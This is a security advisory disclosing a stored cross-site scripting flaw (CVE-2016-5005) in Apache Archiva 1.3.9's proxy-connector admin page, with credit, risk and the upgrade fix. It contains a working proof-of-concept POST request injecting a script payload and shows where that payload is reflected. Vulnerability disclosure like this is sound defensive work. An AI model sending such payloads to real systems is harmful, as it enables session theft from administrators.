Apache Archiva 1.3.9 Cross Site Scripting
Posted on 12 July 2016
RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Apache Archiva Vendor URL: https://archiva.apache.org Type: Cross-Site Scripting [CWE-79] Date found: 2016-05-31 Date published: 2016-07-11 CVSSv3 Score: 5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N) CVE: CVE-2016-5005 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Apache Archiva v1.3.9 older versions may be affected too. 4. INTRODUCTION =============== Apache Archiva™ is an extensible repository management software that helps taking care of your own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as Maven, Continuum, and ANT. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The script "/archiva/admin/addProxyConnector_commit.action" is vulnerable to an authenticated persistent Cross-Site Scripting vulnerability when user- supplied input to the HTTP POST parameter "connector.sourceRepoId" is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to place arbitrary script code permanently on the "Administration - Proxy Connectors" page as well as on the "Admin: Delete Proxy Connector" page. The following Proof-of-Concept triggers this vulnerability and adds a new proxy connector called "XSS<script>alert(document.cookie)</script>": POST /archiva/admin/addProxyConnector_commit.action HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cookie: JSESSIONID=1vabu6a1f9wye; rbkSignon=7574033ea6d44b4a9722cfa53a7b4001; _ga=GA1.2.1956020753.1461333249; __utma=86544839.1956020753.1461333249.1461575160.1461575160.1; __utmz=86544839.1461575160.1.1.utmcsr=premium_main|utmccn=(not%20set)|utmcmd=(not%20set) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 567 pattern=&connector.order=0&connector.proxyId=%28direct+connection%29&connector.sourceRepoId=XSS<script>alert(document.cookie)</script>&connector.targetRepoId=com.springsource.repository.bundles.external&connector.policies%5B%27propagate-errors-on-update%27%5D=always&connector.policies%5B%27cache-failures%27%5D=no&connector.policies%5B%27releases%27%5D=always&connector.policies%5B%27propagate-errors%27%5D=stop&connector.policies%5B%27checksum%27%5D=fail&connector.policies%5B%27snapshots%27%5D=always&propertyKey=&propertyValue=&blackListPattern=&whiteListPattern= The payload is then reflected on the "Administration - Proxy Connectors": <div class="managedRepo"> <img src="/archiva/images/archiva-splat-32.gif"> <p class="id">XSS<script>alert(document.cookie)</script></p> <p class="name"></p> </div> And on the "Admin: Delete Proxy Connector" page: <p> Are you sure you want to delete proxy connector <code>[ XSS<script>alert(document.cookie)</script> , maven2-repository.dev.java.net ]</code> ? </p> 6. RISK ======= To successfully exploit this vulnerability, a user with administrative rights must trick another authenticated user with administrative rights to visit one of the affected pages. Since this scenario is quite unlikely, the attack likelihood can be increased by combining this vulnerability with the Cross-Site Request Forgery vulnerability as described in RCESEC-2016-003 (CVE-2016-4469). The vulnerability allows remote attackers to permanently embed arbitrary script code into the context of the Apache Archiva administrative backend interface, which offers a wide range of possible attacks such as stealing cookies or attacking the browser and its components of a user visiting the page. 7. SOLUTION =========== Upgrade/Migrate to Apache Archiva 2.2.1 8. REPORT TIMELINE ================== 2016-05-31: Discovery of the vulnerability 2016-05-31: Notified vendor via public security mail address 2016-06-06: No response, sent out another notification 2016-06-10: Vendor states that this version is out of support 2016-07-07: Vendor assigns CVE-2016-5005 2016-07-11: Advisory released 9. REFERENCES ============= https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5005